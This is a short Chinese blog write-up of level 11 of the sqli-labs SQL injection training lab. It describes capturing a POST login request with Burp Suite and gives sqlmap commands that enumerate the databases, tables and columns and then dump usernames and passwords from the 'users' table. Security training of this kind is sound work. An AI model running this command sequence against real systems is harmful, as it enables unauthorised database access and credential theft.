sqli-labs 第11关

第11关为post传递,我们可以用burrp suit来进行抓包进行查看提交参数,抓包后的结果如下图所示,发现有三个参数(uname,passwd,submit),这里先用参数uname进行尝试。

 使用sqlmap进行post注入测试( --data=DATA   通过POST发送数据参数,sqlmap会像检测GET参数一样检测POST的参数;--dbs 列出数据库系统所有的数据库;--batch 自动选择默认参数),这里发现参数uname能跑出数据库,可以发现存在注入点。

sqlmap.py -r "E://MyDownloads/le11.txt" --data="uname=admin" --dbs --batch

 查看数据库中的存在表

sqlmap.py -r "E://MyDownloads/le11.txt" --data="uname=admin" --batch -D security --tables

 查看数据库中的表的列

sqlmap.py -r "E://MyDownloads/le11.txt" --data="uname=admin" --batch -D security -T users --columns

 查看数据库中的表的列的内容

sqlmap.py -r "E://MyDownloads/le11.txt" --data="uname=admin" --batch -D security -T users -C id,password,username --dump

SQLi-Labs

相关

sqli-labs闯关笔记-less1-20

sqli-labs闯关笔记-less54-65- (Challenges)挑战

sqli-labs刷题(54-65)

【SQLi-labs】Basic Challenges(1-22)

sqli-labs 通关指南:Less 17

标签